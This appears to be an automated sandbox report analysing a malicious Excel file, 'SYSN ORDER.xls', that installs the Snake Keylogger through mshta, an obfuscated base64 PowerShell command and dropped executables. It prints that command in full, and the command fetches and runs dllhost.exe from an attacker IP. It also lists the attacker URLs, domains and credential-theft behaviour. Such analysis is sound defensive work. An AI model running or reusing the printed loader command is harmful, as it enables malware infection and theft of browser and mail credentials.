Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))"
Source: dllhost.exe, 0000000B.00000000.440804644.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, dllhost.exe, 00000016.00000000.477390475.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, dllhost.exe.7.dr, dllhost[1].exe.7.dr Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.630259466.000000000270D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.630215962.000000000250D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.630215962.0000000002361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Yara detected Credential Stealer
Source: Yara match File source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.630259466.000000000270D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.630215962.000000000250D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.630215962.0000000002361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1522511 Sample: SYSN ORDER.xls Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 98 Multi AV Scanner detection for domain / URL 2->98 100 Suricata IDS alerts for network traffic 2->100 102 Found malware configuration 2->102 104 14 other signatures 2->104 10 EXCEL.EXE 57 29 2->10         started        process3 dnsIp4 66 172.245.123.6, 49164, 49166, 49167 AS-COLOCROSSINGUS United States 10->66 68 og1.in 172.67.216.244, 443, 49163, 49165 CLOUDFLARENETUS United States 10->68 62 C:\Users\user\Desktop\SYSN ORDER.xls (copy), Composite 10->62 dropped 64 C:\Users\...\IEnetbokkworkingforupdate[1].hta, HTML 10->64 dropped 120 Microsoft Office drops suspicious files 10->120 15 mshta.exe 10 10->15         started        19 mshta.exe 10 10->19         started        file5 signatures6 process7 dnsIp8 80 og1.in 15->80 86 Suspicious command line found 15->86 88 PowerShell case anomaly found 15->88 21 cmd.exe 15->21         started        82 104.21.78.54, 443, 49169, 49170 CLOUDFLARENETUS United States 19->82 84 og1.in 19->84 24 cmd.exe 19->24         started        signatures9 process10 signatures11 106 Suspicious powershell command line found 21->106 108 PowerShell case anomaly found 21->108 26 powershell.exe 24 21->26         started        30 powershell.exe 24->30         started        process12 file13 56 C:\Users\user\AppData\Roaming\dllhost.exe, PE32 26->56 dropped 58 C:\Users\user\AppData\...\dllhost[1].exe, PE32 26->58 dropped 60 C:\Users\user\AppData\...\ngxpd0hb.cmdline, Unicode 26->60 dropped 110 Installs new ROOT certificates 26->110 112 Powershell drops PE file 26->112 32 dllhost.exe 1 26->32         started        35 csc.exe 2 26->35         started        38 dllhost.exe 30->38         started        40 csc.exe 30->40         started        signatures14 process15 file16 90 Machine Learning detection for dropped file 32->90 92 Writes to foreign memory regions 32->92 94 Maps a DLL or memory area into another process 32->94 96 Switches to a custom stack to bypass stack traces 32->96 42 RegSvcs.exe 12 2 32->42         started        52 C:\Users\user\AppData\Local\...\ngxpd0hb.dll, PE32 35->52 dropped 46 cvtres.exe 35->46         started        48 RegSvcs.exe 38->48         started        54 C:\Users\user\AppData\Local\...\tnesdt30.dll, PE32 40->54 dropped 50 cvtres.exe 40->50         started        signatures17 process18 dnsIp19 70 reallyfreegeoip.org 188.114.96.3, 443, 49174, 49175 CLOUDFLARENETUS European Union 42->70 72 checkip.dyndns.org 42->72 78 6 other IPs or domains 42->78 74 reallyfreegeoip.org 48->74 76 checkip.dyndns.org 48->76 114 Tries to steal Mail credentials (via file / registry access) 48->114 116 Tries to harvest and steal browser information (history, passwords, etc) 48->116 signatures20 118 Tries to detect the country of the analysis system (by using the IP) 74->118
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
132.226.8.169
 unknown United States
16989 UTMEMUS false
104.21.78.54
 unknown United States
13335 CLOUDFLARENETUS false
172.245.123.6
 unknown United States
36352 AS-COLOCROSSINGUS true
188.114.97.3
 unknown European Union
13335 CLOUDFLARENETUS false
193.122.6.168
 unknown United States
31898 ORACLE-BMC-31898US false
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
193.122.130.0
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false
158.101.44.242
 unknown United States
31898 ORACLE-BMC-31898US false
172.67.216.244
 og1.in United States
13335 CLOUDFLARENETUS false
132.226.247.73
 unknown United States
16989 UTMEMUS false

Contacted Domains

Name IP Active
og1.in 172.67.216.244 true
reallyfreegeoip.org 188.114.96.3 true
checkip.dyndns.com 193.122.130.0 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://og1.in/cIP5a8 false unknown
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta true unknown
http://checkip.dyndns.org/ false
  • URL Reputation: safe
 unknown
https://reallyfreegeoip.org/xml/8.46.123.33 false
  • URL Reputation: safe
 unknown
http://172.245.123.6/770/dllhost.exe true
    		unknown